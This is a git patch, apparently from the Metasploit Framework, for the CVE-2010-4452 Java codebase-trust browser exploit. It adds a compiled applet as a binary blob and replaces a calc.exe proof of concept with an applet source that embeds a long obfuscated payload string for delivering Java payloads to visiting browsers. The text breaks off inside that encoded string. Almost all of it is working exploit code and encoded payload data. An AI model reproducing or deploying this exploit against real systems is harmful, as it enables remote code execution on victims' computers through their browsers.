From fb6107ffb50751abc07255f11ff3b93decde4f72 Mon Sep 17 00:00:00 2001 From: Joshua Drake Date: Thu, 17 Mar 2011 23:57:11 +0000 Subject: [PATCH] enable java payloads, currently via one-off method git-svn-id: file:///home/svn/framework3/trunk@12012 4d416f70-5f16-0410-b530-b9f4589650da --- data/exploits/cve-2010-4452/AppletX.class | Bin 748 -> 13600 bytes .../exploits/cve-2010-4452/AppletX.java | 197 +++++++++++++++++- .../exploits/cve-2010-4452/get_offsets.rb | 10 +- .../windows/browser/java_codebase_trust.rb | 72 ++++--- 4 files changed, 243 insertions(+), 36 deletions(-) 
diff --git a/data/exploits/cve-2010-4452/AppletX.class b/data/exploits/cve-2010-4452/AppletX.class index 855971ad9860885e6ac3dbc8017618b79d57d921..1d68a8185418b29a5baab91ad2edd2fe11ac3eb0 100644 GIT binary patch literal 13600 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 Wid09Hm^K_N)ALv%MTNLIEdK^~7oo@i diff --git a/external/source/exploits/cve-2010-4452/AppletX.java b/external/source/exploits/cve-2010-4452/AppletX.java index 14c67da29c..76bd8cc245 100644 --- a/external/source/exploits/cve-2010-4452/AppletX.java +++ b/external/source/exploits/cve-2010-4452/AppletX.java 
@@ -1,19 +1,198 @@ public class AppletX extends java.applet.Applet { + @SuppressWarnings("unchecked") public void init() { - Process p = null; - System.out.println( "Executing" ); - try { - p = Runtime.getRuntime().exec( "calc.exe" ); - if( p == null ) - { - System.out.println( "Null process, crap" ); - } - p.waitFor(); +String CONFIG = "CONFIGZZ"; +String DATA = ("`f1J@mS#$,D@%=S:g##d<]4%ovA#$*Wc&;'sg4wlnv#%djF+A<**#$*c" + + "g%Yk%,##dWf+A<*.##mci+A<-1#$*um%?1?v#$+&o&AT0B;0Lh#I/Ek7w:#l7w32Y;NG1V#G4qaB=nXVB=hv/B=L=C##00`#EDwnCUjm" + + "XG/%J2HF7~2#Jac>Gc_cc.`Gi?I'%.~B=K4v=`A#pFL?/7(JFkGI'%.~B=KV,8UG*kH+ve" + + "-%nlwhHFeC(Dnor$$qp]8Dn9YK##.;,E0r&)26D&6H`q#*J&#dBFhU~/HEUo*8wJrYDlml" + + "u8>ePj>]iB@8PfCk#I.g]DjV&=H^~NeGd1_uEiriR&53,>CThuTFgZ>6##fTa),((3=MSL" + + "aHb4@68$QRJGed8&#Iw9X;KO?kB>S)qFKKA9HClk,D7XH*E0r)>26D&6:O@#tHGORACVFn" + + "m#D[0.Ej#[N._g&:/o^kqI'%.~B=KV,=aOf&FL?/7;KY(;B>S)qFKKA9EfVli6,.KQ=]PN" + + ",Bte`3Ej~BO&PN5?C9;EOE-cQ>&v6>h2,$nOE,5MY26D&6D7X/qB=L>.vw#'']U/5-J" + + "V#$=r1&o@Vr-VPXd#,D62$;:K,FL>PtE*Erk#B0Zk;Pt13B>S)" + + "qFKKA8HClh+D7XH*1e~=C#$#$>28%BKQ" + + "?#$>;;#Hn-?CUjpYG/%J2HF7~2HEC_6&vM@ECeSDDE+f5U26D&68:,9m8$R0bJ#vb8Hb=6" + + "kGed8'&wMGcD+l9[F(>8TH*)2'DnBi.B:LX#B=hv/Ej%+0#JY>lB=8IWDgPp>6(JFkNB>A)vFguD8;LS)qFKKA9EfVli;SR:bCTq6h),((TB>S)" + + "qFKKA9IZZ:wHFvh&#J+ikFg;6UF0/3]),((GB>S)qFKKA9DP/YvB>~Z3#I/*XCU4@OH*L)" + + "hCU7Ho/mnZ`B=:KdEdM6A27%24Dn^=q#DZs5;KNXWB>S)qFKKA9HClk,D7XH*#GNZ406@:" + + "w&PN50DmErgEfXeQ#JY>l;KPK6B>S)qFKKA9HClk,D7XH*:QAYEB=:L/H$`uHGemn)28s[" + + "THFn3tDnoktFc^L_FL>PtE0r)>26D&6D7X/qB=LS)" + + "qFKKA9HClk,D7XH*E0sjp26D&6D7X/qB=LS)qHEh@E;P$mF&ki=kB>S)qHEh@E;P$mFF]JK" + + "H=h81eBS)qFKKA9BU^ZkHEUnu#Grr8@<;ZV#,3Q:#%dj^####>#%djB#&+'" + + "~#&4-B##5/%#%djQ#&+'_#&4-B##5/%#$q:M#&O?d#$q:5#&O?f##kS+#&jQj#&sWI####" + + "###,)'#'0cp#'9iM#.jk=##G;.0TuK?0N%o`%8=0a#6?E01JK?.1(#U=(f^SJ#71ND~5-7" + + "=#87ML^0)(_~YTd>#4i7,&koT='hl'<#71N;#>~K;(JM9>##);,02)CM*)$?9###2($;;1" + + "<%nmaB'MK?^Q##$FK#u$dk###,&0m5`a;dKJ:%SXl" + + 
"s),.Jn)I=s%T4%a3#6tcC~oq4q#6P37(jE3()bd~~_-6p20VoOg]i4wB#Q,BA[S9L(###/" + + "'5thbl'hfKK5tiM,.SL^`5tj7A5>2qu5tj=C#>>w=##$IL&54QW,>8)@,YSDG,tnYL-;4q" + + "R-VP@~-qkmi.82>2&##$IL#>>>**_ZQ;##$=H#>>,$##$^S2bX9V`f1J@m" + + "S#$0Yd%MSo`##iWII7swo#$/oN&JtLRdnHTA&K1XXdnBvM#+km*ek?Av#+km+fLuQ$#$:k" + + "9F%crh#$02V&Kh(4gIr#Z&L%3ah+S5~&L7?chb7lj##bM4iCjV9##sA]j@fk=##bM4jwH." + + "C#$0~d&M='BktD=c%kmum#$0hh&Ma?5m7~[,&MsJrmn=m.&N0VudS(ff&N9~vnk:31#&O?" + + "N-VOn<##swop.P``#'KuWiCjVP#$1:u&O-8Ki_1h*&O6>*qb.5u#=8E$r_*Sp&Oc~/s@cH" + + "q&Ouh1swJGl#=wo+t=]5*##YD(#####&KD$Z#>G2&#AjHO###2*######?55;$;Ce3%oE@" + + ":%8@%2#>tS4%nv:<#ESpr&PWL@#Ef't9M>e*#$)1;&L[XPtY%?f#ESpr'hnpH%U9$D#?2:" + + ">;G7F6#$)CA&7>O9)biw0&7PZKdnE~D&7Y`M*_fR:&7klN+AGp@&8)#PdnEnJ&82)QdnEt" + + "L#GhE2,Y~Mf%;PuQ#?2gMAkWPY#?/iMAP&u8=wpbU#CZY`3(s[_#$+c/&>K8b?;31Y#CZY`3(s[c#?4l2$r%):#?>#" + + "5&?5c?APFp`#G1v+B2&ZC#G1v+Bh~lG%^5tC#?,2<%86f<<3&rs#E_`ME0q8A26D&6D7X/" + + "qGed776*kIH<`B''AX$/`#Fn5b=d91p?Bmge?qgW*:Jq0sS)qFKKA9EfVli6,.KQ=]GH+DSU/=Bsi&" + + "tBk[QOH+ve-I'%.4FgWL,HEBSaG.L8WHCo<*F00#tBk@?LH+ve-I'%.4FgWL,HGNC+=ho1" + + "&B/DuE0qow.]mm+D7X/qGed7,#IA$;:K" + + "8FL>Pt/n+fbB=:LAEdM6A27%24Dn^=q08F2]&53,/CThuTFgZ>6#?,]b%nm#?HFn+.B>/K" + + "4=~Jk=B=:KcDgPp>FHnN$=ho1&BS)qFKKA9HClk,D7XH*#GNZ4CU4RUCVEEdBsDoTBWZC&##/[KE0r&" + + "(26D&6D7X/qGed776*kIHB=:KdEdM6A27%24Dn^=q#DZs5C97nJHGi7dDng2)##/vWFL>^" + + "j8wIU.##0-UE0r&626D&6D7X/qGed776*kIHI'%.~B=KV,=aOf&FL?/7;KY(;B>S)q27mR" + + "ZCUe)O%nlwhF1uS6J@04*-qjZVB=:KcEdM6A27%24Dn^=q08F2]I'%.~FgWm7Ej~An##.1" + + "oH*q0kHEUo)/opwsI'%.~B=KV,=aOf&FL?/7@S)qFKKA9HClk,D7XH*E0r)>26D&6D7X/qB=L,##/vWI'%..B=KV,<-r8vB=L=" + + "NCQNV^Hb2b_G`cOX'#&;.E(t%N#QFd9~P*FN##2I.I'%.$HGM8HDiucq#?YQW#IXZiC3fwd##0-UHEh=#EkHJ*1r*hI'#7q" + + "iMbUN]#LWWbN_Kr@##0_S##-aTI'%.(FgWm7Ej~AnHGNCl=ho1&B-v?&ki:0Ptd9C'&3LrQq`]IE*NBI26D&6D7X/qGed77#IA<~#RLMIBmC%" + + "hH+ve-DST]'#N#PoRnX.U#N>brSkTX`#?-snTM5jd#?[Hw#QOkuu^'(5l2X%fBo#P%n-+%u_:B>S)qDnpLPHClk1D7XH*CU~5bCW:)0&PN5" + + 
"LElDIe-Epq##AbuIHCk^O>0C~P*EX#?[p/'(uA/E(vB;F'~iNH*)2" + + "'DnBi.B:LX#B=hv/'2/G@CT_NHC9_<`D67o^^e>0O##2^5I'%.'FgWm7HEBSlG.L8WHCo<" + + "*F00#t#QFd9+%u^]B>S)qBsD`9HF7e>CRd',H*qM5FLu83+~Vp]B>S)qBsD`9HF7e>EfDa" + + "$Gd1)bH+w(6&wVwvZV@N*E,#AW26D&6H`q#*J&#dBFhU~/HEUo*8wJrYDlmlu*_ZUUB>S)" + + "qBsD`9HF7e>FcS3)Fe<6ZCThd)E***E26D&628EeE#FJDmDmBXP225~^##-b-I'%..CVMO" + + "7Dn^A-BmY-N28F7IHG3s]BshQj&vZPjZq[l1#QFd9[S72;#?[v1')hq?~kTM8#QXs<(eau" + + "BB>S)qElDJ01pCE1D67p)#?WUn#Qt2@HG9Ve#JbAlB=8=SEdM6A27%24H*(nR[S.+S##27" + + "(I'%.'FgWj6HEBSkG.L8WHCo<*F00#t#5nO6)GC2S)q1qRIXG//6wHCo<*F00#t#5wU" + + "7),();B=:LAEdD0@1p_)3Dn^=q&r1,@^eM@DE*NBI26D&6D7X/qE3;un%DZJg#?~TB#RLP" + + "JB=8IWEdM6A27%24FhVOlEiriu),((GB>S)q27mRZFL?.hGed8'&wMGc`(dRA#R^ZFY=oB" + + "D#$@m/#P.s#H$]Ws`Cp]W##2m:Dlt`w`(UT~#$AQB#PJ0%CO-+e#$>Hb'+P$^M+tfjE*E<" + + "H26D&6Ej^#8B>@H&#$>ZS'+b0ba~BWV#7poJb=rEH##0_S#?WT_#SR7^1jT4,',1IUYYE5" + + "D#SmGQd7k&_#?]2S',^hmeP4=n#J0wKf1c](#?]DY'-I?.geH='#U9@^hFwF^#?]Y`'.*c" + + "2KMBowF]/9EB=]_?#?YQX%LE-`#?]_b'.Eu@j~=T9#4_b+'MJQ/DST]'G-Q+EHED4w#$>o" + + "f#P.rtDlj+F#>>0H%nlwhB>S)qF1Z+A)b^:IB>S)qFKKA9EfVli;SR:bCTq6h),((TB>S)" + + "qFKKA9IZZ:wHFvh&#J+ikFg;6UF0/3]&53,>;nut~B>8N&##/[F;KXC*B>S)qFKKA9HClk" + + ",D7XH*)b^9tB=:KcEdM6A27%24Dn^=q08F2]%86f,<5<(]#I/-XCVC$WBru3o*)$CJ098J" + + "PI'%.~B=KV,=aOf&FL?/7##.1qG._6k#I&*~;KOHnB>S)qFKKA9HClk,D7XH*E0r)>26D&" + + "6D7X/qGed778@*3OCU.Qu##.2'=hAcbFL?/7),((I=MSLaHb4@68$QRJGed8&#Iw9X;KO?" 
+ + "kB>S)qFKKA9HClk,D7XH*E0r)>26D&6:O@#tHGORACVFnm#D[0.FgqQX##/X?E0r%o26D&" + + "6:O@#tHGORACVFnm08FDV),((8B>S)q27mRZHb=6kGed8'#Iw9XEj#XM#I/?lCU4CPFhU~" + + "tHG3t54wkw+B=:KcEdM6A27%24Dn^=q;MSo+B>S)qFKKA9HClk,D7XH*E0r)>26D&6D7X/" + + "qGed776*kIHE*WHJ26D&6D7X/qHFc~)Gd1nrG#SHGCVOo%#Jb5P;KNXWB>S)qFKKA9HClk" + + ",D7XH*#F-a'B>OmWS)qFKKA9HClk,D7XH*&PN4jS)qFKKA9HClk,D7XH*B=:KvEdM6A27%24Dn^=q08F2]I'%.~B=KV,-W1]9Y>5W#I/*_CTmwHCVXN$/l)IO##/9RHEh*sFh_CTCVY)4DST~~/oL_" + + "oI'%.~FgWm7Ej~AnE0r`%26D&6D7X/qGed776*kIH##/-NHEh*qCVF5WDj#4`##/[K;KXC" + + "&B>S)q27mRZCUe)O$qp~eDm4#t##00_E0r%h26D&69RC]q6*Y7D##/-NBS)q27mRZG//6wHCo<*F00#tB=:K" + + "vEdM6A27%24Dn^=q08F2](JFk6B>S)qFKKA9H_)n,F1$,2&53,>=MSLaDnp8:##/[L;KXC" + + "+B>S)qFKKA9H_)n,F1$,2##.1oCW'dj/kc;ZE0sj]26D&6D7X/qGed776*kIHB=:KdEdM6" + + "A27%24BtJDc6,.KUE*WHJ26D&6D7X/qFhU~/H+vq(D-?pDFHps_=ho1&B)c(/+bSB>S)qFKKA9IwJC1F0Ti3Db^::)b^:" + + "RI'%.~FgWm7G.L8%HCo<*F00#t#ttAb#JbK(E0qAD26D&6S)qFKKA9HClk,D7XH*>]iW'/l2OP#GNZBBrqSCHFvh&/meT_B=:KdFF.HC=aP8*CU[f" + + "q##.2)HEh*sG//6wHCo<*F00#t/n=rdB=:KdDgPp>H^c~1HGORGCVFnm#D[0.;KO9iB>S)" + + "qFKKA9HClk,D7XH*B=:KvEdM6A27%24Dn^=q08F2]&PN50FMVn/EP#2q#JY/k06@:w%nlw" + + "vHGjC9CU~5b#ttB@#I%aN;KNp_B>S)qBsD`9HF7e>CRd',H*qM5FLu83#GNZ4;KOZtB>S)" + + "qHEh@E;P$mFE0sjp26D&6H`q#*J&#dBGd1b8CQC-oCpeB/HEC~p>]i-C/r]j8I'%.~CVMO" + + "7Dn^A-8UGa.=g;MZBte`3E0r`%26D&6H`q#*J&#dBGd1)%H+w(68~/iXCUe3&FgZ>)>]i-" + + "LGZ+TH:Tw9B##03~BdkC##/-NCp@M^8[30NH+ve-/sQE@I'%.~B=KV" + + ",=aOf&FL?/78>ePcE0s4l26D&6H`q#*J&#dBFhU~/HEUo*8wJrYDlmlu;KY(BB>S)qFKKA" + + "9EfVli6,.KQGZXrMEk?D-EfXeY#JY>l;KNUVB>S)qFKKA9EfVli6,.KQ##/-NIBd[$HG=?" 
+ + "mCThWf/mnZ`B=:KdEdM6A27%24CUR]O#D[E7CU4=NHEg2i#I&-`;KP0-B>S)qFKKA9HClk" + + ",D7XH*E0sjp26D&6D7X/qB=L.7wRCTh0j/n=rdI'%.~FgWm7Dn]&)HCo<#F00#t#GNZ4I^')" + + "~H,+L=G#/0C#IJQu;KO6hB>S)qFKKA9BU^ZkHEUnuE0r)>26D&6D7X/qE3;un6,6vFGuXi" + + "KGcbqwGe8(0DHQsDFd[<_FeES)qDnpLPCSEK%Ge8(2Gu+KF#I/TmFh@f['2/GLB=qg#FhhG0B=(%M#>>0B+~Vp" + + "-;KY?YB>S)qFKKA9HClk,D7XH*CpJ2R#D[?7Ej5pSFKo~t#J`XN:NR=TB=:KdEdM6A27%2" + + "4CUR]O#D[E7;KOHnB>S)qFKKA9BU^ZkHEUnuE0r)>26D&6D7X/qGed778@*3OCU.Qu##.2" + + "'C:~+fCn#[a/l2OP#F-a5HbTkjGeeC5#IA8##.[AI'%-" + + "uHGM8H;L<5tEiiin%86f;;NjkJ#F&/^E0q8A26D&6Ej^#8BtI&q6*Y7wa6M,[ML-5~gB5]M]VT_4r," + + "V_5/;Y]ql-@$tTlO]P[`].:*Qh]NbIK#6PTB_,ECD+/L,a]l=Zn%Yc<6?YofY]m0j(%u)E" + + "7#6G3Q/ki^)#6ufb#6S+@]QFiw]Qk&l#6GH?)GISU#6tU#%qSms5^*5@#$_aO&r$].&nMD" + + "k?[)S_V+qJ]&S2MW)c$l`1JG5i+>j,w1eb>h?ZlGb#6P6Q0ipDi2-pZ3+++)#1eb>h%=J6" + + "i?[_wl^4-c$?_9/Y=b.2l%:o^L=`+6O]QaXe]Uo[;'S~ML#6GBV*)*f'#6GBV*)*f(^4cQ" + + ")_c&X#$)JeK?_7XG]N#hU?_8]L=]?8G%:oaM#vTHm(1@c9W&V`&E)cww(`)dgg+(#$G+'97h=A6/6#?ZY]_DhMr]qnY2%V8UC(j?:" + + "-#6Fq0]iQ(m#5qS+########%1##,)(#$q]VkiC#6wO<#6wDA#6wDBB3n`P$*F:@]rqGQ%:s'R5d:>%#88[" + + "u]MTQ1%t~Cs%gWJ[$Y9[0#6G6R#BhT5)c$f^]MobY5c&-tDbRTI#6G'M)c~f3hFjDL_.Nc" + + "L]ql-@E*`uW1L'ql]NbIK#6YZC+&Y.(ED3fK$tTa0_bt;e$)MKBc+3oaF^>S^?WR7@XgwN" + + "B#5wg1$Dg~Bc+F&cG?te`?WR7@Xh4ZD#5wg1$`-eEc+X2eGvUwb?WR7@XhFfF#5wg1#6Ii" + + "J$rn1j?blaZ=]$&B=a1(U$=sCIHq^uN(egj4$Y9L+?c2s[In[>+~&JF[###&$$V^~,##'5" + + "E##)O1#>>8(&59W<_b@^H]1`6/?q^Q(#YY;'<(m9q#6%;#,>=NU?W[=D~6/hE#6K9V]ZCe" + + "$#6GH?#6ZMmc$)k6#6u8Q#6S+@JkWI_(gI(Q(/20i0O=bk;T~wQ%SXlr-qq('#6ZOa##)8" + + "T&53(-_b@dJ]1`6/0h_RN#>>2&,tn;B?W[=D0NeDg~6K%G#3CD>Xj.Pg2-pGi]NbIK#5f*" + + ";######7CNB##,+:###%.##G;Y####'#6ZN,<)$*CMG1I5_.kKn#5g'O######7UZD##,+<###%.##G=6####)MbLbgN(g^e#6ZNR13ZIO#6HYd#6w>" + + "i$@#^NO%cj<<1Et$OA**<1QMP-5b7uf+4h-3Ow`;jX~o/jP?vNW#6G$L+wwEePYAN>&ko$" + + ",?YofY.SR=)#6HF`#4kp~$=t_u?.8ld_?g2C]ql-@$AJvn)c8Lv#6HD_.SQT#W_`k;$=sW" + + 
